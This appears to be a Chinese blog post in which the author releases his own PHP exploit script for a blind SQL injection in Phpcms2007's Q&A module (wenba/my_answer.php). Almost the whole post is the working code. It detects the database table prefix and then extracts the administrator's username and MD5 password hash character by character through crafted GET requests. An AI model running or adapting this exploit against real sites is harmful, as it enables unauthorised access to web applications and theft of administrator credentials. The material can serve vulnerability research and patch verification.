早前在phpcms 0day频发的时候写的这个exp,藏着这个exp藏了一个多月吧,也没有拿它去打站,一直丢在我硬盘里,今天看到11期的黑防公布了,于是我也丢出来吧:
PHP代码
- <?
- print_r('
- --------------------------------------------------------------------------------
- Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit
- BY oldjun[S.U.S](http://www.oldjun.com)
- --------------------------------------------------------------------------------
- ');
- if ($argc<3) {
- print_r('
- --------------------------------------------------------------------------------
- Usage: php '.$argv[0].' host path
- host: target server (ip/hostname),without"http://"
- path: path to phpcms
- Example:
- php '.$argv[0].' localhost /
- --------------------------------------------------------------------------------
- ');
- die;
- }
- function sendpacketii($packet)
- {
- global $host, $html;
- $ock=fsockopen(gethostbyname($host),'80');
- if (!$ock) {
- echo 'No response from '.$host; die;
- }
- fputs($ock,$packet);
- $html='';
- while (!feof($ock)) {
- $html.=fgets($ock);
- }
- fclose($ock);
- }
- $host=$argv[1];
- $path=$argv[2];
- $prefix="phpcms_";
- $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
- if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
- {echo "Error... check the path!\r\n\r\n"; die;}
- /*get $prefix*/
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Cookie: ".$cookie."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- //echo $html;
- if (eregi("in your SQL syntax",$html))
- {
- $temp=explode("FROM ",$html);
- if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}
- if($temp2[0])
- $prefix=$temp2[0];
- echo "[+]prefix -> ".$prefix."\r\n";
- }
- echo "[~]exploting now,plz waiting...\r\n\r\n";
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n"; die;}
- $chars[0]=0;//null
- $chars=array_merge($chars,range(48,57)); //numbers
- $chars=array_merge($chars,range(97,102));//a-f letters
- $j=1;$password="";
- while (!strstr($password,chr(0)))
- {
- for ($i=0; $i<=255; $i++)
- {
- if (in_array($i,$chars))
- {
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;}
- }
- if ($i==255) {die("Exploit failed...");}
- }
- $j++;
- }
- $j=1;$username="";
- while (!strstr($username,chr(0)))
- {
- for ($i=0; $i<=255; $i++)
- {
- $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
- $packet.="Host: ".$host."\r\n";
- $packet.="Connection: Close\r\n\r\n";
- sendpacketii($packet);
- if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\r\n";break;}
- if ($i==255) {die("Exploit failed...");}
- }
- $j++;
- }
- print_r('
- --------------------------------------------------------------------------------
- [+]username -> '.$username.'
- [+]password(md5 32λ) -> '.$password.'
- --------------------------------------------------------------------------------
- ');
- function is_hash($hash)
- {
- if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
- else {return false;}
- }
- if (is_hash($password)) {echo "Exploit succeeded...";}
- else {echo "Exploit failed...";}
- ?>
